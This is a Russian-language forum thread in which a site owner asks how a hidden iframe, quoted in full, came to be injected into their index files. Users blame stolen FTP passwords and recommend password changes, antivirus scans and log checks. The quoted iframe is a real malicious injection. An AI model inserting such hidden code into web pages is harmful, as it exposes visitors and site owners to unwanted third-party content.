Хакнули сайт

[akxxiv]

Хакнули сайт

Хакнули сайт. В индексный файл, а так же в файлы с названием index.php и default.php добавили такой вот код:

<iframe src=\"http://hosttracker.net/?click=60911859\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>

Вопрос - кто-нибудь с таким сталкивался, и каким образом это может быть сделано? Как поступать в таких случаях, как найти дыру?
Хостинг виртуальный на агаве.

 

[Апокалипсис]

в поиск по форуму!
более 5 раз подымались темы.

 

[dr-sm]

пароль фтп слил трой, скорее всего

 

[Иван 76]

Не пользуйся менеджером сохранения паролей в браузерах и ФТП-клиентах. Делай антивирусную проверку своего компа. Есть даже бесплатные антивирусные утилиты, например avast, CureIt от DrWeb и пр.
Смени ФТП - пароль на хостинге.

 

[confguru]

Смотри логи ftp на сервере.

 

[Активист]

http://phpclub.ru/talk/showthread.php?s=&threadid=96807&rand=63

 

[Viktor_Rez]

Смени пароли от фтп, юзай CuteFTP и полечи систему от троянов.

 

[Mr.M.I.T.]

вовсе не обязательно фтп, может там php инъекция

 

[HraKK]

Mr.M.I.T.
Не может.

 

[antson]

Mr.M.I.T.
последние 2года сайты ломают на 99,9% процентов
через угон фтп паролей.
Пока IE дает :
а) через HTTP_Request скачать файл
б) записать его на диск в любое место (народ должен отучиться сидет под админом на домашнем компе)
в) да еще его запустить на выполнение

имхо никто не будет искать дыры в сайте,
им пароли и так на блюдечке приносятся.

 

[Активист]

а еще нормальной антивирусную защиту не покупают... предпочитают воровать...

-~{}~ 07.11.08 07:33:

кстати. не только IE....

 

[antson]

Активист
угу оперу через пдф научились пробивать гдето в августе этого года.

 

[AmdY]

antson
не трогайте бедного ослика ломают всё. а у большинства стоит пиратская винда, в которой изначально зашит хацкерский софт.
у меня както фтп сломали, на который я лазал только из под линухи

-~{}~ 07.11.08 07:49:

а через сафари мак сломали, а огнелис и вовсе скоре догонит бедный ие, особенно с плагинами

 

[Активист]

>у меня както фтп сломали, на который я лазал только из под линухи

Это как? Из под рута запустил трояна?

 

[AmdY]

Активист
да вот чего не знаю, того не знаю, к тому времени я уже разучился под рутом работать. здесь либо меня, либо сервак сломали, на котором фряха

 

[Активист]

AmdY
Сперли хеш из shadow и подбирали?)))) На сервере))?

У мну была маниакальная идея - поймать троян, когда сидел под debian в качестве десктопа в течении года... не нашел... хотя так хотел...

 

[igortik]

Да, фтп.
Тоже был случай, всунули iframe в индекс-страницу.
Смена фтп данных на более продвинутых, нежели возможных подобрать за 3-4 часа брут-форсом помогло.

Только до сих пор не ясно зачем это кому-то понадобилось, там аудитории от силы 50 в сутки и тематика не детская, где юные хацкеры путешествуют.

 

[cafer]

поставил бы фаерволл....и не сохраняй пассы..

 

[HraKK]

cafer
Тут не любят оч умных дигеров, ясно?

 

[флоппик]

HraKK, а где тут умные?